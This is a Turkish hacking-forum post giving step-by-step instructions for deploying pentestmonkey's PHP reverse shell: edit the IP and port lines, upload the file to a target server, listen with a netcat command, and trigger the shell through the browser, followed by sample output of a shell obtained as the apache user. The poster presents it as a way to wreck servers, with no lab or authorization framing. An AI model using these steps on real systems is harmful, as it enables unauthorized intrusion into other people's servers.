PHP Reverse Shell Kullanımı (pentestmonkey)

Discussion in 'Hack Dökümanları - Hack Articles' started by t0rrent, Nov 9, 2018 at 3:53 PM.

  1. t0rrent

    t0rrent Üst Tabaka

    Mesajlar:
    127
    Likes Received:
    204
    Pentest Monkey tarafından yaratılan bu dosya ile normal sheller ile Backconnect yapamadığınız takdirde php-reverse-shell.php sayesinde çok basit şekilde bağlantı kurabilir, Sunucuyu alt üst edebilirsiniz. Kısaca anlatmak gerekirse;



    php-reverse-shell.php'deki 49. Satırda yer alan IP adresi yerine kendi IP adresinizi yazınız.

    $ip = '127.0.0.1'; // CHANGE THIS



    php-reverse-shell.php'deki 50.Satırda yer alan numara yerine Modeminizde ki açık portu yazınız.


    $port = 1234; // CHANGE THIS



    Gerekli düzenlemeyi yaptıktan sonra php-reverse-shell.php'yi bağlantı kurmak istediğiniz sunucuya yükleyiniz. Ardından CMD'yi açarak (Başlat > Çalıştır > cmd yolunu izleyerek) nc -v -l -p [DINLENCEKPORTNO] komutunu girerek gelecek olan bağlantıyı dinlemeye başlayınız.


    Dinlemeye başladıktan sonra yüklediğiniz shell adresine http:// sunucusu üzerinden girmeniz yeterli olacaktır. Bağlantı kurduğu takdirde aşağıda ki gibi bir CMD çıktısı ile karşı karşıya kalacaksınız!

    Code:
    $   nc   -v   -n   -l   -p   1234
     listening   on   [any]   1234   ...   
     connect   to   [127.0.0.1]   from   (UNKNOWN)   [127.0.0.1]   58012   
     Linux   somehost   2.6.19-gentoo-r5   #1   SMP   PREEMPT   Sun   Apr   1   16:49:38   BST   2007   x86_64   AMD   Athlon(tm)   64   X2   Dual   Core   Processor   4200+   AuthenticAMD   GNU/Linux   
       16:59:28   up   39   days,   19:54,      2   users,      load   average:   0.18,   0.13,   0.10   
     USER               TTY                        LOGIN@         IDLE         JCPU         PCPU   WHAT   
     root         :0                        19May07   ?xdm?         5:10m      0.01s   /bin/sh     
     uid=81(apache)   gid=81(apache)   groups=81(apache)   
     sh:   no   job   control   in   this   shell   
     sh-3.2$



    Reverse shell github linki
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım
     
Loading...

Bu sayfayı Paylaş